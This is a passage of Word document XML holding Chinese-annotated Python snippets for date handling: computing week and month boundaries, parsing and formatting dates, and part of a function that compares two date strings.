    <w:p w14:paraId="1294B541" w14:textId="77777777" w:rsidR="00CD1BEA" w:rsidRDefault="00CD1BEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取今天的日期</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFA42A5" w14:textId="77777777" w:rsidR="00CD1BEA" w:rsidRDefault="00CD1BEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>today = datetime.date.today()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DBB173" w14:textId="77777777" w:rsidR="00CD1BEA" w:rsidRDefault="00CD1BEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B3345D7" w14:textId="77777777" w:rsidR="00CD1BEA" w:rsidRDefault="00CD1BEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取本周的第一天（星期一）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290B4ABC" w14:textId="77777777" w:rsidR="00CD1BEA" w:rsidRDefault="00CD1BEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>first_day_of_week = today - datetime.timedelta(days=today.weekday())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313ECB11" w14:textId="77777777" w:rsidR="00CD1BEA" w:rsidRDefault="00CD1BEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51010A90" w14:textId="77777777" w:rsidR="00CD1BEA" w:rsidRDefault="00CD1BEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取本月的第一天</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFF29C7" w14:textId="77777777" w:rsidR="00CD1BEA" w:rsidRDefault="00CD1BEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>first_day_of_month = today.replace(day=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF28D9C" w14:textId="77777777" w:rsidR="00CD1BEA" w:rsidRDefault="00CD1BEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="762F7D19" w14:textId="77777777" w:rsidR="00CD1BEA" w:rsidRDefault="00CD1BEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取本周之前的日期</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DF29C9" w14:textId="77777777" w:rsidR="00CD1BEA" w:rsidRDefault="00CD1BEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>dates_before_this_week = [first_day_of_month + datetime.timedelta(days=i) for i in range((first_day_of_week - first_day_of_month).days)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A52C7AF" w14:textId="77777777" w:rsidR="00CD1BEA" w:rsidRDefault="00CD1BEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24C338E0" w14:textId="77777777" w:rsidR="00CD1BEA" w:rsidRDefault="00CD1BEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7069BAF8" w14:textId="77777777" w:rsidR="00CD1BEA" w:rsidRDefault="00CD1BEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本月本周之前的日期：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2336B4E1" w14:textId="77777777" w:rsidR="00CD1BEA" w:rsidRDefault="00CD1BEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>for date in dates_before_this_week:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4530BC" w14:textId="04C5EE17" w:rsidR="000B1360" w:rsidRDefault="00CD1BEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print(date)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E21F69C" w14:textId="77777777" w:rsidR="000B1360" w:rsidRDefault="000B1360" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EA71867" w14:textId="459CDF59" w:rsidR="007F5AC8" w:rsidRDefault="00BB56F4" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="482" w:name="_Toc159779925"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转换时间：将</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB56F4">
        <w:t>'Feb 27, 2023'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变为标准时间</w:t>
      </w:r>
      <w:bookmarkEnd w:id="482"/>
    </w:p>
    <w:p w14:paraId="2DC9001C" w14:textId="77777777" w:rsidR="00BB56F4" w:rsidRDefault="00BB56F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="430A38C5" w14:textId="77777777" w:rsidR="00BB56F4" w:rsidRDefault="00BB56F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from datetime import datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A30A7E4" w14:textId="77777777" w:rsidR="00BB56F4" w:rsidRDefault="00BB56F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37A5DD39" w14:textId="77777777" w:rsidR="00BB56F4" w:rsidRDefault="00BB56F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>date_string = 'Feb 27, 2023'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28701688" w14:textId="36531C91" w:rsidR="00BB56F4" w:rsidRDefault="00BB56F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>date_obj = datetime.strptime(date_string, '%b %d, %Y')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD25603" w14:textId="6F1D2743" w:rsidR="007F5AC8" w:rsidRDefault="00BB56F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print(date_obj)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B23983" w14:textId="53E3AA74" w:rsidR="007F5AC8" w:rsidRDefault="00BB56F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB56F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>注意，这里的</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB56F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>date</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB56F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>_obj</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB56F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB56F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB56F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> datetime.datetime</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB56F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D508F8" w14:textId="77777777" w:rsidR="00BB56F4" w:rsidRDefault="00BB56F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="677444EA" w14:textId="77777777" w:rsidR="00BB56F4" w:rsidRDefault="00BB56F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="663BCC14" w14:textId="288CD425" w:rsidR="00BB56F4" w:rsidRDefault="00814084" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="483" w:name="_Toc159779926"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>atetime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型格式化字符串</w:t>
      </w:r>
      <w:bookmarkEnd w:id="483"/>
    </w:p>
    <w:p w14:paraId="1E9CC729" w14:textId="77777777" w:rsidR="00BB56F4" w:rsidRDefault="00BB56F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from datetime import datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9129F6" w14:textId="77777777" w:rsidR="00BB56F4" w:rsidRDefault="00BB56F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F03B9CD" w14:textId="77777777" w:rsidR="00BB56F4" w:rsidRDefault="00BB56F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># create a datetime object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFBDBFE" w14:textId="77777777" w:rsidR="00BB56F4" w:rsidRDefault="00BB56F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>now = datetime.now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7533761D" w14:textId="77777777" w:rsidR="00BB56F4" w:rsidRDefault="00BB56F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52472461" w14:textId="77777777" w:rsidR="00BB56F4" w:rsidRDefault="00BB56F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># format the datetime object as a string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4B822C" w14:textId="77777777" w:rsidR="00BB56F4" w:rsidRDefault="00BB56F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>date_string = now</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5AD1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.strftime('%Y-%m-%d %H:%M:%S')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CD78CD" w14:textId="77777777" w:rsidR="00BB56F4" w:rsidRDefault="00BB56F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42A00765" w14:textId="77777777" w:rsidR="00BB56F4" w:rsidRDefault="00BB56F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># print the string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431E7E69" w14:textId="10488D01" w:rsidR="007F5AC8" w:rsidRDefault="00BB56F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print(date_string)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688D3C88" w14:textId="77777777" w:rsidR="007F5AC8" w:rsidRDefault="007F5AC8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06290168" w14:textId="77777777" w:rsidR="007F5AC8" w:rsidRDefault="007F5AC8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59168BAC" w14:textId="7B0105C2" w:rsidR="00021B6B" w:rsidRDefault="00BD51C3" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="484" w:name="_Toc159779927"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比较</w:t>
      </w:r>
      <w:r w:rsidR="00021B6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个时间字符串</w:t>
      </w:r>
      <w:bookmarkEnd w:id="484"/>
    </w:p>
    <w:p w14:paraId="679FB1C3" w14:textId="77777777" w:rsidR="00021B6B" w:rsidRDefault="00021B6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E9D836D" w14:textId="77777777" w:rsidR="001E6532" w:rsidRDefault="001E6532" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>timeCompare</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time1</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time2</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>用于比较两个类似</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'2023-05-17'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的时间戳字符串看谁更早。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>如果比</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>更早或同天的话，返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>；否则返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    Args:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        time1 (str):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>传入类似</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'2023-05-17'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的时间字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        time2 (str):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>传入类似</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'2023-05-17'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的时间字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    Return:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        res (bool):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        """</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>datetime1 = datetime.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>strptime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'%Y-%m-%d'</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datetime2 = datetime.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>strptime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'%Y-%m-%d'</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
